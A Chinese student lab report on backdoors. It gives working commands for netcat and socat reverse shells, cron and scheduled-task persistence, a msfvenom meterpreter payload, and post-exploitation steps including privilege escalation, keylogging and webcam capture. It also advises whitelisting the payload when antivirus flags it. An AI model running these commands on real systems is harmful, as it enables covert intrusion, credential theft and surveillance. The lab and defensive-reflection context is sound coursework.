20145221高其_後門原理與實踐

20145221高其_後門原理與實踐

實驗目錄

• windows主機與kali虛擬機實現互聯互通
• 使用netcat獲取主機操做Shell，cron啓動
• 使用socat獲取主機操做Shell, 任務計劃啓動
• 使用MSF meterpreter生成可執行文件，利用ncat或socat傳送到主機並運行獲取主機Shell
• 使用MSF meterpreter生成獲取目標主機音頻、攝像頭、擊鍵記錄等內容，並嘗試提權
• 可選加份內容：使用MSF生成shellcode,注入到實踐1中的pwn1中，獲取反彈鏈接Shell，加份內容一併寫入本實驗報告

實驗準備

• 後門：後門程序就是留在計算機系統中，供某位特殊使用者經過某種特殊方式控制計算機系統的途徑。後門包括從簡單到奇特，有不少的類型。簡單的後門可能只是創建一個新的帳號，或者接管一個不多使用的帳號;複雜的後門(包括木馬)可能會繞過系統的安全認證而對系統有安全存取權。例如一個login程序，當你輸入特定的密碼時，你就能以管理員的權限來存取系統。
• 工具儲備：
  • meterpreter
  • netcat（linux，通常自帶）
  • ncat(windows)
  • socat
• cron：
  • cron是一個linux下 的定時執行工具 ，能夠在無需人工干預的狀況下運行做業。
  • crontab -u //設定某個用戶的cron服務，通常root 用戶在執行 這個命令的時候須要此參數
  • crontab -l //列出某個用戶cron服務的詳細內容
  • crontab -r //刪除 沒個用戶的cron服務
  • crontab -e //編輯某個用戶的cron服務

實驗過程

windows主機與kali虛擬機實現互聯互通

• 首先在win主機上下載ncat軟件，併爲其配置好環境變量，用於在cmd的使用
• 打開虛擬機，輸入指令ifconfig，查看其IP地址，並ping一下win主機，觀察是否能ping通
  • 在本實驗中，win_IP：172.30.6.85，linux_ip：192.169.18.128
• 上述幾步是必要準備步驟，該項任務較爲簡單，不作過多贅述，接下來只需在一個系統開啓監聽端口，在另外一臺虛擬機開啓請求鏈接便可
• windows開啓監聽端口：
• kali發起鏈接請求：

使用netcat獲取主機操做Shell，cron啓動

Windows得到Linux的Shell

• 在windows上打開cmd，並經過ncat開放端口5221
• 在linux上反彈鏈接win：nc 169.254.1.65 5221 -e /bin/sh
• 固然除此ls命令，還可使用mkdir、cp等經常使用命令
• 使用cron開啓Linux定時鏈接：
• crontab指令增長一條定時任務，-e表示編輯，接下來會進入編輯狀態，在最後一行參照以前的格式加入一條自動執行netcat的指令便可，以下圖
• 設定57分時自動開啓，因此當主機時間到了57分時，就能夠獲取kali的shell了
• 使用任務計劃程序開啓Windows定時鏈接：
• 在控制面板->管理工具->任務計劃程序中添加任務
• 在「操做」中新建一個操做，寫入參數：-e cmd.exe 192.168.6.85 5221

• 而後可根據須要設置條件便可。

Linux得到Windows的Shell

• 同上述操做，在linux下設置監聽端口：nc -l -p 5221
• 在windows下請求鏈接：ncat 192.168.18.128 5221 -e cmd.exe
• 在linux下輸入ipconfig查看主機IP：

使用socat獲取主機操做Shell, 任務計劃啓動

• 下載安裝socat軟件，下載地址
• 爲其配置環境變量
• 在windows上開放5221端口，並把cmd的stderr重定向到stdout
  • socat tcp-listen:5221 exec:cmd,pty,stderr
• 在linux開啓監聽：socat - tcp:172.30.6.85:5221
• 以下圖，能夠發現成功鏈接到kali虛擬機：

使用MSF meterpreter生成可執行文件

• 經過meterpreter生成後門程序：20145221.exe
  • linux下輸入指令：msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.18.128 LPORT=80 -f exe > 20145221.exe
• 接下來須要將這個後門程序傳到咱們的靶機上，能夠經過ncat來實現
• 首先我在win的cmd下使用ncat.exe -lv 443 > 20145221.exe命令在443號端口進行監聽
• 而後在Linux下使用ncat -nv 172.20.10.2 443 < 20145221.exe命令把文件傳送過去

使用MSF meterpreter生成獲取目標主機音頻、攝像頭、擊鍵記錄等內容，並嘗試提權

• MSF打開監聽進程
  • msfconsole：進入msf
  • use exploit/multi/handler：進入handler模式
  • set payload windows/meterpreter/reverse_tcp：設置payload
  • show options：查看當前信息狀態
  • set LHOST 192.168.18.128：設置LHOST
  • set LPORT 80：設置LPORT
  • exploit：MSF開始監聽
• 在windows下打開運行20145221.exe木馬程序，此時殺毒軟件可能會報毒，點擊找回文件並添加到信任區便可，而後就能夠在linux攻擊機上取得靶機的shell了
• 經過help查看可使用的指令：
• 經過screenshot進行屏幕截圖：
• 經過getsystem提權：
• 經過keyscan_start和keyscan_dump來記錄靶機的鍵盤輸入：
• 經過webcam_snap捕捉鍵盤記錄
• 經過run metsvc爲主機安裝一些系統服務

可選加份內容：使用MSF生成shellcode,注入到實踐1中的pwn1中，獲取反彈鏈接Shell，加份內容一併寫入本實驗報告

• loading。。。

實驗思考

例舉你能想到的一個後門進入到你係統中的可能方式？

• 有時候咱們須要下載一些工具軟件，在網絡中搜索時，每每靠前的匹配項不是官方提供的連接，當咱們經過這樣的第三方平臺下載的軟件，就頗有可能經過咱們的主動點擊下載安裝到本身的主機上，使本身的電腦感染木馬病毒。

例舉你知道的後門如何啓動起來(win及linux)的方式？

• win：首前後門可能做爲一個exe文件藏在咱們的主機下，而後能夠經過誘導用戶主動點擊、修改註冊表、添加到開機自啓動項、或者和咱們經常使用的軟件綁定在一塊兒同時啓動，具備很高的隱蔽性。
• linux：linux中能夠經過crontab功能將木馬設爲定時啓動，也能夠經過對正常軟件的綁定注入shellcode達到開啓後門的目的。

Meterpreter有哪些給你映像深入的功能？

• Meterpreter功能強大，一旦能夠控制靶機，就能夠實現許多功能，這些功能在本次實踐中看似有趣，可是在現實生活中，卻對咱們的隱私和安全都是一大威脅。
• 好比，當咱們在登陸QQ時，若是木馬已經啓動，就能夠監測咱們鍵盤錄入，竊取QQ密碼；又好比，一些不法分子能夠經過盜取主機權限入侵攝像頭，對自身與家庭的隱私會有極大傷害。

如何發現本身有系統有沒有被安裝後門？

• 首先，咱們能夠經過計算機的入侵檢測系統以及防火牆，對系統的行爲有一個全面的檢測，在必定程度上能夠避免被裝後門；
• 其次，能夠經過殺毒防禦軟件對計算機進行保護，檢查是否有後門，按期更新病毒庫，養成查殺電腦的好習慣；
• 最後，咱們能夠手動查看任務計劃程序、開機自啓動項中查找有關可疑程序。

參考資料

• MAL_後門原理與實踐
• linux中Cron定時任務系統命令詳解
• socat的安裝與使用